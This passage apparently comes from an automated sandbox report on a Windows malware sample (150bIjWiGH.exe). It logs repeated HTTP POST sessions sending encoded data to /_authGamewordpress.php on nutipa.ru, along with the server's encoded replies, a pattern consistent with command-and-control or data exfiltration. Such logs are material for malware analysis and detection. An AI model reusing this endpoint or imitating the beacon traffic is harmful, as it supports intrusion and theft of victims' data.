                                                            Data Ascii: PVC]_YXQ]ZVQPZWWUP^CZS[R\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'(-"Z)#<5<=+#Y;2%&-.*3;'5= =,;.F'#P /
                                                            Dec 15, 2024 19:36:55.141838074 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:55.385963917 CET798INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:55 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dwy0IJa000S8Q5NRJCOPKokDBVq6gAg5leYQuOOqf%2F0DWLsPeSTWKvCty0zjxkUplbKEdrp5Afg4ZJF%2FPqiWEfJ%2FedTeHd0fy9E60UE%2Flvm1Mi6%2BXHAVu8I7fRo%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288abba82a7ce4-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3667&min_rtt=2027&rtt_var=4041&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=96369&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            25192.168.2.449770104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:55.643879890 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:56.009288073 CET2536OUTData Raw: 50 56 46 5d 5f 5a 58 55 5d 5a 56 51 50 5a 57 5b 55 57 5e 48 5a 5e 5b 5a 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PVF]_ZXU]ZVQPZW[UW^HZ^[Z\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'<=2*9'\6-([/X#<;&-12);^$=%(W-+.F'#P /
                                                            Dec 15, 2024 19:36:56.725564957 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:56.987046957 CET802INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:56 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h3B5zazHm9v%2BsFCX%2BWTPUzwW3lgQytKb2oYjHoiWzpyo9iDyIGc3W8QViyeERwrFoCerHFw6hJU%2BrFtH7%2BiaQPDBNXNa9TFMjLZc0LyAz%2B%2BjwB2g3nfe%2FRqr8Pk%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288ac59f4d43dc-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4715&min_rtt=1798&rtt_var=6509&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=58074&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            26192.168.2.449771104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:57.231673002 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:57.576150894 CET2536OUTData Raw: 55 53 43 5e 5a 5b 58 55 5d 5a 56 51 50 59 57 50 55 57 5e 47 5a 51 5b 52 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: USC^Z[XU]ZVQPYWPUW^GZQ[R\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'<"[>\8"<!+=7\ 1>X1.)#;$.Y< >;;.F'#P #
                                                            Dec 15, 2024 19:36:58.319809914 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:58.573551893 CET794INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:58 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sjZyyT138YEMoG4fwfEW7vWWXvNmg8odxCZccGykVO8UI4%2BEn6O5pGxUJX8d1fK4PIWtGF0dcX%2BvoWLVMUiRYh6auLqxUGVf%2BSCvxqKZV7fcFvw8fV7kagxPRJk%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288acf8ba9427f-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=5095&min_rtt=2235&rtt_var=6559&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=58123&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            27192.168.2.449772104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:58.338721991 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1420
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:58.685787916 CET1420OUTData Raw: 50 54 43 59 5a 5d 5d 52 5d 5a 56 51 50 5f 57 50 55 57 5e 47 5a 5e 5b 53 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PTCYZ]]R]ZVQP_WPUW^GZ^[S\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$\("^)7[!*)>, $Z2=&X%X1*0#^'-(09;.F'#P
                                                            Dec 15, 2024 19:36:59.436161995 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:59.692468882 CET945INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:59 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Akj2TzcJjLiK%2F56t6fDwCbLKgSs69A84n%2ByX5nRKntuQP8WzOw1H65IiAbAN77NkFal0rJo9AXx5CSVGW%2BsZGITEDAWiUhdE0pmJMMPfXvHfRnoBdHHFXnGjMA%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288ad68d4a5e6e-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=14378&min_rtt=9357&rtt_var=13552&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1716&delivery_rate=29476&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 3a 05 21 03 2e 52 37 3e 34 55 2c 2c 31 19 29 20 37 1b 27 1c 2d 1d 30 2b 3c 04 28 2d 27 11 26 17 03 11 37 0c 2a 0f 3f 09 3d 10 26 26 21 51 03 11 22 5f 25 10 2f 05 2a 00 2b 07 24 31 3f 5b 25 2e 24 5c 28 2b 26 55 27 38 34 0d 23 3d 24 52 3a 03 3b 03 28 3a 28 07 2e 10 2d 0c 34 36 2e 53 0c 17 26 00 2b 29 3e 5b 20 31 25 1e 24 12 33 55 20 39 3e 1e 3e 23 09 0d 27 23 2b 57 33 00 24 1b 36 0e 36 0f 25 39 36 5b 37 1c 0c 13 29 08 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 98:!.R7>4U,,1) 7'-0+<(-'&7*?=&&!Q"_%/*+$1?[%.$\(+&U'84#=$R:;(:(.-46.S&+)>[ 1%$3U 9>>#'#+W3$66%96[7)%\ .R4]T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            28192.168.2.449773104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:58.823796988 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:59.169837952 CET2536OUTData Raw: 50 51 43 5e 5f 5f 58 50 5d 5a 56 51 50 51 57 5a 55 50 5e 40 5a 56 5b 53 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PQC^__XP]ZVQPQWZUP^@ZV[S\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$^?=:_?:"9)-#,(Z&>1>-U*U'Y'5=#R-;.F'#P
                                                            Dec 15, 2024 19:36:59.921649933 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:00.164580107 CET796INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:00 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WVBlxFvCS1OlF9PN7%2FS%2BfAWZ7amztISxApljerUGmGRd11i43sAaHU%2BfWaNS4WlnYYpdMG2lgO4N0ncnQNyYVhsYjZP9tDADsE5N8R3A7E2j1G92T%2FA5zuUV0Ho%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288ad98a0c4361-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3967&min_rtt=1737&rtt_var=5111&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=74573&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            29192.168.2.449774104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:00.416440964 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:00.763627052 CET2536OUTData Raw: 55 55 43 50 5f 58 5d 55 5d 5a 56 51 50 5c 57 51 55 56 5e 48 5a 50 5b 52 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UUCP_X]U]ZVQP\WQUV^HZP[R\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'+.=?* 6?>E+#7?%!1=W>3'=*\(T-+.F'#P 7
                                                            Dec 15, 2024 19:37:01.504556894 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:01.740034103 CET799INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:01 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Kx%2Fq5lZVislhRApFYMgJ9f4mgvkCMX3ILm3tM9%2FXfKgGj7dwf1uZyGselsoPSqnDzh8Kxn0YxDeDpePOorjQQF%2BTkUce8JosFgR9Zr%2BXAAEeoluK1FKmx%2Bs9Ls%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288ae37ec78cc3-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3782&min_rtt=2591&rtt_var=3355&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=120402&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            30192.168.2.449775104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:01.973566055 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:02.326430082 CET2536OUTData Raw: 55 54 46 5b 5f 58 5d 54 5d 5a 56 51 50 50 57 50 55 56 5e 42 5a 56 5b 58 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UTF[_X]T]ZVQPPWPUV^BZV[X\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'?"Z=X#<.@?/732>Y&Q)_'-&=0)T/;.F'#P
                                                            Dec 15, 2024 19:37:03.059873104 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:03.311392069 CET794INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:03 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UowF9PCCW1bmkWHZ5x%2BLXEyNBTRn0pY%2BUvNdUC95fcNFsyJVKkA9wTldLuL2FKQb78xZAaGH7bxZ%2BXbjRXSR5wMcPx3VMOhkbKNEceK5XDghGDrSWSx4ZIInkPs%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288aed2e62726f-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4230&min_rtt=2004&rtt_var=5205&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=73666&cwnd=171&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            31192.168.2.449776104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:03.694891930 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:04.045048952 CET2536OUTData Raw: 50 55 46 5d 5a 5b 58 55 5d 5a 56 51 50 5e 57 54 55 5d 5e 45 5a 55 5b 52 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PUF]Z[XU]ZVQP^WTU]^EZU[R\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'+"X>:,"<+-+[702>&X%:)#/X$"<#&,+.F'#P ?
                                                            Dec 15, 2024 19:37:04.775824070 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:05.073611975 CET791INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:04 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RNlc6cCI3BAg9lA2zAkOPyIen9R61xgi94G5QX%2BtK6fx0iauzF3eAiUcSuB%2FC0OQh%2BR1Btidoxg1iqescXH4NAO95UO4%2FnSU283SU7nueugyTsNp22VJviSj4kI%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288af7eb66de92-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4031&min_rtt=1560&rtt_var=5528&sent=4&recv=8&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=68435&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a
                                                            Data Ascii: 44W@T
                                                            Dec 15, 2024 19:37:05.211983919 CET5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            32192.168.2.449777104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:04.823810101 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1392
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:05.169830084 CET1392OUTData Raw: 55 50 46 5a 5a 5b 58 54 5d 5a 56 51 50 58 57 53 55 55 5e 47 5a 50 5b 52 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UPFZZ[XT]ZVQPXWSUU^GZP[R\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$+=_*:(!Z))>+\ 411%=.=#?X$-*\?0!T,+.F'#P #
                                                            Dec 15, 2024 19:37:05.914911985 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:06.180558920 CET943INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:06 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2vhUTML%2F6MOjghhNFkqY5CXTiCvNoOefLcBMgeRvBJyCGO%2FfFmyjgEEgF6%2BwkPqh8slxfhVB2Tg5fNcglb9fINJ4FpS9NPVZ8kXjdFvnnnUPYuHCS8zSbbLfnOo%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288aff0aa65e80-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4459&min_rtt=1734&rtt_var=6100&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1688&delivery_rate=62035&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 39 10 35 04 3e 1f 37 10 28 19 39 2c 25 50 3c 33 23 1b 24 31 26 07 30 2b 3b 14 3e 3e 3f 11 31 2a 21 13 23 0c 31 56 3f 09 26 01 32 0c 21 51 03 11 22 1d 24 2d 2c 58 3e 2a 30 5c 32 1f 23 5a 24 3e 20 5f 28 06 3a 56 30 38 24 0b 22 2d 28 1a 2d 14 38 1f 3f 39 28 05 2d 07 3a 50 21 26 2e 53 0c 17 26 03 2b 17 39 07 37 0c 39 55 30 2f 2b 54 37 5f 3a 10 3e 23 01 0f 30 0d 0d 55 26 3e 34 19 22 33 3a 09 32 5c 21 03 34 32 36 1c 3e 08 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 9895>7(9,%P<3#$1&0+;>>?1*!#1V?&2!Q"$-,X>*0\2#Z$> _(:V08$"-(-8?9(-:P!&.S&+979U0/+T7_:>#0U&>4"3:2\!426>%\ .R4]T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            33192.168.2.449778104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:05.466188908 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:05.810556889 CET2536OUTData Raw: 55 53 43 5c 5f 5e 58 5e 5d 5a 56 51 50 59 57 56 55 50 5e 43 5a 5e 5b 5d 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: USC\_^X^]ZVQPYWVUP^CZ^[]\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$Z+[&> #,=<-3[7? Y2-=%.!=3_'>!+0:/.F'#P #
                                                            Dec 15, 2024 19:37:06.552443981 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:06.799824953 CET790INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:06 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
